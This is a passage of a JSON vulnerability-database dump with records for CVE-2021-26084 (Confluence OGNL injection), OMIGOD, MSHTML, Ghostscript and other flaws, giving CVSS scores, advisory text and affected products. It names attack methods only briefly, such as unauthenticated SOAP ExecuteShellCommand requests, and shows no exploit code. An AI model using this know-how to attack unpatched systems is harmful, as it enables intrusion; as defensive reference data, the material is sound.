Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-12-01T09:03:37", "id": "2BE90BD5-68B3-521E-B2DF-923D04CC1189", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-05-27T15:45:35", "description": "# CVE-2021-26084\nCVE-2021-26084\uff0cAtlassian Confluence OGNL\u6ce8\u5165\u6f0f\u6d1e\n\nA...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-26T06:01:38", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-09-03T22:05:44", "id": "3E0FF5E7-F93E-588A-B40A-B3381FB12F73", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-09-11T11:54:52", "description": "# CVE-2021-26084-EXP\r\n\r\nThis code is an exploit for the CVE-2021...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-03T07:31:29", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-09-11T11:40:35", "id": "5CB77852-699B-52CD-AF0E-AFD2DE82A2B2", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-25T03:02:01", "description": "# CVE-2021-26084\n\nCVE-2021-26084 Remote Code Execution on Conflu...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T09:50:26", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-07-25T01:08:52", "id": "24774A85-D9E4-55DC-8D1F-EC48351B23C1", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}], "saint": [{"lastseen": "2021-11-26T18:36:50", "description": "Added: 09/28/2021 \n\n\n### Background\n\n[Microsoft Azure Open Management Infrastructure](<https://github.com/microsoft/omi>) is an open source project to further the development of a production quality implementation of the DMTF CIM/WBEM standards. \n\n### Problem\n\nA vulnerability in Open Management Infrastructure allows remote attackers to execute arbitrary commands by sending a SOAP `**ExecuteShellCommand**` request without an Authorization header. \n\n### Resolution\n\n[Upgrade](<https://github.com/microsoft/omi-kits/tree/master/release>) to Open Management Infrastructure 1.6.8-1 or higher. \n\n### References\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647> \n<https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/> \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-28T00:00:00", "type": "saint", "title": "Microsoft Azure Open Management Infrastructure remote command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-28T00:00:00", "id": "SAINT:B21EB0CE85BB4A8171AF59A4CF014F01", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/microsoft_azure_omi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-19T20:31:18", "description": "Added: 09/28/2021 \n\n\n### Background\n\n[Microsoft Azure Open Management Infrastructure](<https://github.com/microsoft/omi>) is an open source project to further the development of a production quality implementation of the DMTF CIM/WBEM standards. \n\n### Problem\n\nA vulnerability in Open Management Infrastructure allows remote attackers to execute arbitrary commands by sending a SOAP `**ExecuteShellCommand**` request without an Authorization header. \n\n### Resolution\n\n[Upgrade](<https://github.com/microsoft/omi-kits/tree/master/release>) to Open Management Infrastructure 1.6.8-1 or higher. \n\n### References\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647> \n<https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/> \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-28T00:00:00", "type": "saint", "title": "Microsoft Azure Open Management Infrastructure remote command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-28T00:00:00", "id": "SAINT:A224EF4FDA8E067B5A4576A0BC6D6F10", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/microsoft_azure_omi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T15:53:10", "description": "Added: 09/28/2021 \n\n\n### Background\n\n[Microsoft Azure Open Management Infrastructure](<https://github.com/microsoft/omi>) is an open source project to further the development of a production quality implementation of the DMTF CIM/WBEM standards. \n\n### Problem\n\nA vulnerability in Open Management Infrastructure allows remote attackers to execute arbitrary commands by sending a SOAP `**ExecuteShellCommand**` request without an Authorization header. \n\n### Resolution\n\n[Upgrade](<https://github.com/microsoft/omi-kits/tree/master/release>) to Open Management Infrastructure 1.6.8-1 or higher. \n\n### References\n\n<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-38647> \n<https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/> \n \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-28T00:00:00", "type": "saint", "title": "Microsoft Azure Open Management Infrastructure remote command execution", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-28T00:00:00", "id": "SAINT:E5FBEA63E5EE8A91F5066541141037D1", "href": "https://download.saintcorporation.com/cgi-bin/exploit_info/microsoft_azure_omi", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mscve": [{"lastseen": "2023-06-14T15:25:07", "description": "Windows WLAN AutoConfig Service Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mscve", "title": "Windows WLAN AutoConfig Service Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36965"], "modified": "2021-09-23T07:00:00", "id": "MS:CVE-2021-36965", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36965", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:25:03", "description": "Open Management Infrastructure Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mscve", "title": "Open Management Infrastructure Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2021-09-20T07:00:00", "id": "MS:CVE-2021-38647", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-38647", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-14T15:25:09", "description": "Microsoft is investigating reports of a remote code execution vulnerability in MSHTML that affects Microsoft Windows. Microsoft is aware of targeted attacks that attempt to exploit this vulnerability by using specially-crafted Microsoft Office documents.\n\nAn attacker could craft a malicious ActiveX control to be used by a Microsoft Office document that hosts the browser rendering engine. The attacker would then have to convince the user to open the malicious document. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.\n\nMicrosoft Defender Antivirus and Microsoft Defender for Endpoint both provide detection and protections for the known vulnerability. Customers should keep antimalware products up to date. Customers who utilize automatic updates do not need to take additional action. Enterprise customers who manage updates should select the detection build 1.349.22.0 or newer and deploy it across their environments. Microsoft Defender for Endpoint alerts will be displayed as: \u201cSuspicious Cpl File Execution\u201d.\n\nUpon completion of this investigation, Microsoft will take the appropriate action to help protect our customers. This may include providing a security update through our monthly release process or providing an out-of-cycle security update, depending on customer needs.\n\nPlease see the **Mitigations** and **Workaround** sections for important information about steps you can take to protect your system from this vulnerability.\n\n**UPDATE** September 14, 2021: Microsoft has released security updates to address this vulnerability. Please see the Security Updates table for the applicable update for your system. We recommend that you install these updates immediately. Please see the FAQ for important information about which updates are applicable to your system.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-07T07:00:00", "type": "mscve", "title": "Microsoft MSHTML Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40444"], "modified": "2022-08-16T07:00:00", "id": "MS:CVE-2021-40444", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-40444", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-19T15:18:24", "description": "This CVE was assigned by Chrome. Microsoft Edge (Chromium-based) ingests Chromium, which addresses this vulnerability. Please see [Google Chrome Releases](<https://chromereleases.googleblog.com/2021>) for more information.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-09-14T07:00:00", "type": "mscve", "title": "Chromium: CVE-2021-30632 Out of bounds write in V8", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30632"], "modified": "2021-09-14T07:00:00", "id": "MS:CVE-2021-30632", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-30632", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2023-05-23T15:35:42", "description": "Windows WLAN AutoConfig Service Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "cve", "title": "CVE-2021-36965", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36965"], "modified": "2021-09-25T11:27:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:21h1", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2022:-", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_7:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_server_2016:-"], "id": "CVE-2021-36965", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-36965", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:r2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2022:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:21h1:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_7:-:sp1:*:*:-:*:-:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-27T14:41:18", "description": "An integer overflow was addressed with improved input validation. This issue is fixed in Security Update 2021-005 Catalina, iOS 14.8 and iPadOS 14.8, macOS Big Sur 11.6, watchOS 7.6.2. Processing a maliciously crafted PDF may lead to arbitrary code execution. Apple is aware of a report that this issue may have been actively exploited.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-08-24T19:15:00", "type": "cve", "title": "CVE-2021-30860", "cwe": ["CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-30860"], "modified": "2022-09-30T15:05:00", "cpe": ["cpe:/o:apple:mac_os_x:10.15.7"], "id": "CVE-2021-30860", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-30860", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-003:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-002:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:-:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-004:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2021-001:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.15.7:security_update_2020:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:37:27", "description": "A trivial sandbox (enabled with the `-dSAFER` option) escape flaw was found in the ghostscript interpreter by injecting a specially crafted pipe command. This flaw allows a specially crafted document to execute arbitrary commands on the system in the context of the ghostscript interpreter. The highest threat from this vulnerability is to confidentiality, integrity, as well as system availability.", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 9.9, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-16T19:15:00", "type": "cve", "title": "CVE-2021-3781", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-3781"], "modified": "2023-01-31T17:29:00", "cpe": ["cpe:/o:fedoraproject:fedora:34", "cpe:/a:artifex:ghostscript:9.54.0", "cpe:/a:artifex:ghostscript:9.50", "cpe:/a:artifex:ghostscript:9.53.3", "cpe:/a:artifex:ghostscript:9.52"], "id": "CVE-2021-3781", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-3781", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:artifex:ghostscript:9.53.3:*:*:*:*:*:*:*", "cpe:2.3:a:artifex:ghostscript:9.52:*:*:*:*:*:*:*", "cpe:2.3:a:artifex:ghostscript:9.50:*:*:*:*:*:*:*", "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*", "cpe:2.3:a:artifex:ghostscript:9.54.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-05-23T15:39:12", "description": "Open Management Infrastructure Remote Code Execution Vulnerability", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-15T12:15:00", "type": "cve", "title": "CVE-2021-38647", "cwe": ["CWE-665"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-38647"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:microsoft:azure_automation_update_management:-", "cpe:/a:microsoft:azure_automation_state_configuration:-", "cpe:/a:microsoft:azure_diagnostics_\$lad\$:-", "cpe:/a:microsoft:azure_security_center:-", "cpe:/a:microsoft:azure_stack_hub:-", "cpe:/a:microsoft:azure_open_management_infrastructure:-", "cpe:/a:microsoft:azure_sentinel:-", "cpe:/a:microsoft:system_center_operations_manager:-", 